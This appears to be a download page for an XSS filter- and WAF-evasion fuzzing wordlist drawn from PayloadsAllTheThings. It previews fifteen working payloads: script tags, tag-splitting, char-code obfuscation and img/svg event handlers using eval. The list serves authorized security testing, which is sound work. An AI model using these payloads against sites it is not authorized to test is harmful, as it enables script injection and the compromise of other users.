XSS WAF-Bypass Intruders (PayloadsAllTheThings)
Curated XSS vectors emphasising filter and WAF evasion, including tag-splitting, char-code obfuscation and malformed svg/img handlers. For bypassing input filters during XSS testing.
- Size
- 11 KB
- Category
- Fuzzing
- Source
- swisskyrepo/PayloadsAllTheThings
- License
- MIT
- Recommended tools
- wfuzzburpffuf
Preview
First 15 entries. Download or copy the full list (11 KB) using the buttons above.
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>Curated XSS vectors emphasising filter and WAF evasion, including tag-splitting, char-code obfuscation and malformed svg/img handlers. For bypassing input filters during XSS testing.
This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 11 KB and pairs well with tools such as wfuzz, burp, ffuf. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.
You can copy the sample preview straight from this page, copy the entire list to
your clipboard, or download the raw .txt file. The full list is served directly
from its upstream source on GitHub.
Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.